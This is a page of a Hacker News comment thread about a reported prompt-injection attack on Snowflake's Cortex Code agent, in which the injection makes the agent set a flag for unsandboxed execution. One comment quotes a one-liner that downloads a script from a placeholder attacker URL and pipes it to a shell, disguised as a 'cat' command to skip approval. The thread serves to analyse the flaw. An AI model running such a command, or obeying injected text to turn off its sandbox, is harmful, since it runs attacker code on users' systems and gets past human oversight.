Snowflake AI Escapes Sandbox and Executes Malware

Posted by ozgune 6 hours ago

Snowflake AI Escapes Sandbox and Executes Malware(www.promptarmor.com)

183 points | 53 commentspage 2

simonw 4 hours ago|

One key component of this attack is that Snowflake was allowing "cat" commands to run without human approval, but failing to spot patterns like this one:

  cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

I didn't understand how this bit worked though:

> Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.

HOW did the prompt injection manipulate the model in that way?

1718627440 2 hours ago||

> cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

The cat invocation here is completely irrelevant?! The issue is access to random network resources and access to the shell and combining both.

tkp-415 4 hours ago||

Process substitution is a new concept to me. Definitely adding that method to the toolbox.

It'd be nice to see exactly what the bugbot shell script contained. Perhaps it is what modified the dangerously_disable_sandbox flag, then again, "by default" makes me think it's set when launched.

maCDzP 4 hours ago||

Has anyone tried to set up a container and let prompt Claude to escape and se what happens? And maybe set some sort of autoresearch thing to help it not get stuck in a loop.

kingjimmy 4 hours ago||

Snowflake and vulnerabilities are like two peas in a pod

mritchie712 5 hours ago||

what's the use case for cortex? is anyone here using it?

We run a lakehouse product (https://www.definite.app/) and I still don't get who the user is for cortex. Our users are either:

non-technical: wants to use the agent we have built into our web app

technical: wants to use their own agent (e.g. claude, cursor) and connect via MCP / API.

why does snowflake need it's own agentic CLI?

lunatuna 4 hours ago||

When you say just Cortex it is ambiguous as there is Cortex Search, Agents, Analyst, and Code.

Cortex Code is available via web and cli. The web version is good. I've used the cli and it is fine too, though I prefer the visuals of the web version when looking at data outputs. For writing code it is similar to a Codex or Claude Code. It is data focussed I gather more so than other options and has great hooks into your snowflake tables. You could do similar actions with Snowpark and say Claude Code. I find Snowflake focus on personas are more functional than pure technical so the Cortex Code fits well with it. Though if you want to do your own thing you can use your own IDE and code agent and there you are back to having an option with the Codex Code CLI along with Codex, Cursor or Claude Code.

dboreham 4 hours ago||

Because "stock price go up"?

SirMaster 3 hours ago||

To be an effective sandbox, I feel like the thing inside it shouldn't even be able to know it's inside a sandbox.

jeffbee 4 hours ago||

It kinda sucks how "sandbox" has been repurposed to mean nothing. This is not a "sandbox escape" because the thing under attack never had any meaningful containment.

DannyB2 4 hours ago||

AIs have no reason to want to harm annoying slow inefficient noisy smelly humans.

techsystems 4 hours ago||

Is there a bash that doesn't allow `<` pipes, but allows `>`?

1718627440 2 hours ago|

It's open source, just delete the code and recompile it. The run *LLMs* they have the compute.

Duplicake 3 hours ago||

the title is very misleading, it was told to escape, it didn't do it on its own as you would think from the title

seedpi 4 hours ago|

[flagged]

More comments...